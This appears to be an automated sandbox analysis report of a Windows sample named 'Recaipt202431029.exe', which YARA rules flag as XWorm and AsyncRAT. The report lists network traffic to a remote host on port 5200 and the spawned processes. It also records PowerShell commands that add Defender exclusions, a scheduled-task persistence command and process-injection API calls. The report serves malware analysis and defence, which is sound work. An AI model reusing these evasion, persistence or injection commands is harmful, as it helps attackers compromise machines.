              Dec 24, 2024 11:30:31.964910030 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.084388018 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.154804945 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.158493042 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.278021097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.280983925 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.400558949 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:34.360301971 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:34.415103912 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.309220076 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.428772926 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.784873009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.790932894 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.912759066 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.962009907 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.081568003 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.081619024 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.203946114 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.203994036 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.323442936 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.323545933 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.439402103 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.443154097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.443239927 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.562776089 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.642142057 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.643551111 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.754785061 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.763078928 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.763343096 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.876730919 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.882903099 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.882997990 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.946614981 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.996859074 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.002567053 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.002672911 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.122289896 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.337340117 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.456866980 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.735990047 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.737478971 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.856988907 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:41.743418932 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:41.862850904 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.220835924 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.224585056 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:42.344028950 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.432879925 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:42.552320004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.900892973 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.909048080 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:43.028569937 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:51.665287018 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:51.784821033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.125722885 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.129017115 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:52.248620033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.977881908 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.097578049 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.097697020 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.217309952 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.346873045 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.348716021 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.468254089 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.547373056 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.549067974 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.668612003 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.696461916 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.815953970 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:54.158190966 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:54.162909031 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:54.282397032 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.259129047 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:58.378782034 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.641803026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.643299103 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:58.763344049 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:04.360023022 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:04.415060997 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.167897940 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.287348032 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:06.579488993 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:06.582926035 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.702656031 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.180875063 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:10.308480024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.562880993 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.563869953 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:10.689730883 CET520049710172.245.244.69192.168.2.5

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:05:27:01
              Start date:24/12/2024
              Path:C:\Users\user\Desktop\Recaipt202431029.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0x170000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:3
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0xc10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
              Imagebase:0xc10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
              Imagebase:0xb50000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:05:27:04
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:05:27:04
              Start date:24/12/2024
              Path:C:\Users\user\Desktop\Recaipt202431029.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0xc10000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Target ID:10
              Start time:05:27:05
              Start date:24/12/2024
              Path:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Imagebase:0x810000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 68%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:11
              Start time:05:27:07
              Start date:24/12/2024
              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Imagebase:0x7ff6ef0c0000
              File size:496'640 bytes
              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
              Has elevated privileges:true
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"
              Imagebase:0xb50000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:14
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
              Imagebase:0x8d0000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Has exited:true

                Execution Graph

                Execution Coverage:10.4%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:50
                Total number of Limit Nodes:1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $eq$,aq$,aq$4c]q$4c]q$heq$heq$heq$|b^q$|b^q$|b^q$$]q$$]q$$]q$;($[0$c]q$c]q$c]q$c]q$k0
                • API String ID: 0-1774614325
                • Opcode ID: b2d677cd1ffa03988c0dcd742715f2a5bdf5a1b79c3114b4e9a01f6bab923d42
                • Instruction ID: e49ea4fdc22fcba9e3d4d859bf08f0360cd48a85e1e03fb100de91248f58cb52
                • Opcode Fuzzy Hash: b2d677cd1ffa03988c0dcd742715f2a5bdf5a1b79c3114b4e9a01f6bab923d42
                • Instruction Fuzzy Hash: 4FB23474B002148FCB64EF29C994A69BBF6FF88300F1585A9E50ADB365DB34EC81CB51

                Control-flow Graph of the function at 068858C0 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: LR]q$LR]q$LR]q$LR]q
                • API String ID: 0-453796159
                • Opcode ID: 6fe97c23a4e7a3144da31e7fb8df63af8d6fe890cc7fe0b6a24874cbdf22627d
                • Instruction ID: c14b1e3c270fc136b70f9066c0425c1fd1dada92a9c5ef445e9eca812526e630
                • Opcode Fuzzy Hash: 6fe97c23a4e7a3144da31e7fb8df63af8d6fe890cc7fe0b6a24874cbdf22627d
                • Instruction Fuzzy Hash: 45324A34A002099FDB88EF59D484AAEBBF2FF48304F148559E506EB365D770ED81CB92

                Control-flow Graph of the function at 06D1CF80 [rendered graph omitted; basic-block edge list not reproduced. API calls on the graph: VirtualAllocEx, WriteProcessMemory]
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D1D018
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocMemoryProcessVirtualWrite
                • String ID:
                • API String ID: 645232735-0
                • Opcode ID: 7b2504730311c638b2e029ff0b09e80c8afb4664fbad394eddcf05e4e6adc807
                • Instruction ID: b25c4cbe4c31ddbecf0d248287945df5157fea3abc2109488b9a76361a6d8088
                • Opcode Fuzzy Hash: 7b2504730311c638b2e029ff0b09e80c8afb4664fbad394eddcf05e4e6adc807
                • Instruction Fuzzy Hash: 954147B18003499FCB10DFAAD884BEEBBF1FF48310F10842AE559A7251C7B99945CBA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: 57d10d20ffdc75e2bf8bcc0aaf7d3a8b62f6840e1397abefc40f9b98c4f3de8b
                • Instruction ID: c9cac6450e7038a8fbbe7bd9473dcda2e9e3ab5ef476ffbe830603d29ffc6f41
                • Opcode Fuzzy Hash: 57d10d20ffdc75e2bf8bcc0aaf7d3a8b62f6840e1397abefc40f9b98c4f3de8b
                • Instruction Fuzzy Hash: 0C429D34B042159FCB259F68D854AAEBBA6FF88701F148529E906DB3D5CF34DC82CB91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: ebda1bf2242fcc5402714f19321455aa1f92fd057b39d59f6ba5627f8c059bf1
                • Instruction ID: e6a5115b8ea751b895379240da948097bccb2b1b4a1e7afe56f15372cadae1a5
                • Opcode Fuzzy Hash: ebda1bf2242fcc5402714f19321455aa1f92fd057b39d59f6ba5627f8c059bf1
                • Instruction Fuzzy Hash: AD125D34B006158FCB14DF68C594AAEBBF6FF88701B158569D906EB3A5DB34EC42CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Pq]q
                • API String ID: 0-2540548202
                • Opcode ID: 4ad085572b68695b0d122729d5a3172264e669f37dc14a1d3b7df24f62d6fa1a
                • Instruction ID: 8c3f3601a4c62337127524286f2b115a928443451c9205e3713d6e14650e247f
                • Opcode Fuzzy Hash: 4ad085572b68695b0d122729d5a3172264e669f37dc14a1d3b7df24f62d6fa1a
                • Instruction Fuzzy Hash: F8D1B274E002188FDB54DFA9D994A9DBBF2FF88300F1085A9D809A7365DB34AD86CF51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Pq]q
                • API String ID: 0-2540548202
                • Opcode ID: 0ba4348d62c4c0e942fae97358f6e5468ee31b5226bafad635cc62f73842084f
                • Instruction ID: 9a14f2d650b87509c5993544034a567d8d4e3cf6237f454c2516596aad9049f8
                • Opcode Fuzzy Hash: 0ba4348d62c4c0e942fae97358f6e5468ee31b5226bafad635cc62f73842084f
                • Instruction Fuzzy Hash: D5B1A374E012188FDB54DFA9D994A9DBBF2FF88304F1085A9D409AB365DB309D46CF50
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51915b67664caafada6331ad980817a7bdb2707f7490d4530de3accad7c8ae13
                • Instruction ID: 26f12dbdbbcff868ea0e4b1d950cafb2592289e55c16c4776b4e5af68f47102e
                • Opcode Fuzzy Hash: 51915b67664caafada6331ad980817a7bdb2707f7490d4530de3accad7c8ae13
                • Instruction Fuzzy Hash: F7424770A002448FDB54EF68C594A6EBBF6EF88300F19846DE506DB7A6DB34ED45CB90
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ac431810f1b6087f83615493207de0e3e24bc9b6d9619dedb033a153819736e0
                • Instruction ID: 82c2b7a3adc5451d73b543c531bca58047590a67aa24abd1cda892121c3eb88e
                • Opcode Fuzzy Hash: ac431810f1b6087f83615493207de0e3e24bc9b6d9619dedb033a153819736e0
                • Instruction Fuzzy Hash: 5A425832A00302CFDB65EF69D54866EB7F6FF84315F148869D242CB2A5DB35E885CB50
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d097e40aca7e19dd5337cab85a58872a1d8ae00aa4601dfec2768dc2dde85c60
                • Instruction ID: bab3059b3b484ead9e50335d5e15dd248c7fce177190d42229416d35b531f4f2
                • Opcode Fuzzy Hash: d097e40aca7e19dd5337cab85a58872a1d8ae00aa4601dfec2768dc2dde85c60
                • Instruction Fuzzy Hash: DA125A70A013048FD758EB69D59866EB7FAFF88300B10846CE506D77A6CF79AC46CB51
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2256d3a62e7ba8afaf2e24864aee127f1a128f6579867594c8007ee52d3911fc
                • Instruction ID: a5f0238972ab1e6c61d53ac59f13f73b5d71957e5756ba14912ace3c8510a690
                • Opcode Fuzzy Hash: 2256d3a62e7ba8afaf2e24864aee127f1a128f6579867594c8007ee52d3911fc
                • Instruction Fuzzy Hash: 7A125BB4A002058FD745DF68C584EAABBF6FF88300B15C4A9E549DB362CB34ED45CBA1
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9151e4fc3326bd30878334317ae08a442e4a9a5bc5b19e61aa9dcbb86ea02012
                • Instruction ID: 814a8a473dd58f357ed285273d419744443f7ccaf7afa224e3b028fcc1337613
                • Opcode Fuzzy Hash: 9151e4fc3326bd30878334317ae08a442e4a9a5bc5b19e61aa9dcbb86ea02012
                • Instruction Fuzzy Hash: F4025735A04705CFDB65CF6AC988A6EBBF2BF48300F148969E456DB761DB34E885CB40
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bcc03b73b2ed7ac4aea8a18a83bc59738651dc92a2c8c6b18583b68e5565c5b
                • Instruction ID: 56466335ddce15fdf2e88a5b89165a3ae9cb26a7e6ad3a4bc1a4e1a726dfe6b0
                • Opcode Fuzzy Hash: 2bcc03b73b2ed7ac4aea8a18a83bc59738651dc92a2c8c6b18583b68e5565c5b
                • Instruction Fuzzy Hash: 37F1BD70A002099FCB15DF68D884B9EBBF6FF84311F148569E505EB2A2DB34ED46CB91
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9fc7c275194af78d29695c703e44072b58ad0f49f2a1fdb7f58a798dda7c19c2
                • Instruction ID: 09a9bbdca331e14c6a5e39261b1871f071429259249ff2dda42c2a16a39afeca
                • Opcode Fuzzy Hash: 9fc7c275194af78d29695c703e44072b58ad0f49f2a1fdb7f58a798dda7c19c2
                • Instruction Fuzzy Hash: 7FF17274A002099FDB44EFA8D854AADBBF6FF88304F108469D506EB365DB35ED46CB90

                Control-flow Graph of the function at 08501F30 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $#]q$(Abq$(o]q$, ]q$,aq$,aq$0"]q$4']q$4c]q$Hb^q$LR]q$PH]q$Pp]q$X#]q$\;]q$\s]q$p ]q$p<]q$pBbq$p`]q$x bq$xaq$|b^q$|bq$bq$$]q$;]q$c]q
                • API String ID: 0-2453648194
                • Opcode ID: e09a8bda121999c8402dd00bf55215cda2a143ba94cf0a778666171001b9dbb6
                • Instruction ID: f5ccfa360769846cc564e621f8583267287432a410d187abd398b19bd8803646
                • Opcode Fuzzy Hash: e09a8bda121999c8402dd00bf55215cda2a143ba94cf0a778666171001b9dbb6
                • Instruction Fuzzy Hash: CC638D70A40318AFDB25ABA4CD44BDD7BBAFF88300F1040D9E6096B2A5DB756E84CF15

                Control-flow Graph of the function at 06889E68 [rendered graph omitted; basic-block edge list not reproduced]
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: (aq$(aq$(aq
                • API String ID: 0-2593664646
                • Opcode ID: 315ec5446aa9def934676625b9e8f6ae3b42c019d916ef2d1da95f01bd392a39
                • Instruction ID: f585d3f24b0e1f75caceda38974f36a7dc90539c00013bbb2178640fc2f31b66
                • Opcode Fuzzy Hash: 315ec5446aa9def934676625b9e8f6ae3b42c019d916ef2d1da95f01bd392a39
                • Instruction Fuzzy Hash: 6A310332B046155FCB98AF6DD440AAFBBE6EFC53607248129E809DB389DE71DD06C391

                Control-flow Graph of the function at 06D1CEC0 [rendered graph omitted; basic-block edge list not reproduced. API calls on the graph: VirtualAllocEx, Wow64SetThreadContext]
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocContextThreadVirtualWow64
                • String ID:
                • API String ID: 2727713192-0
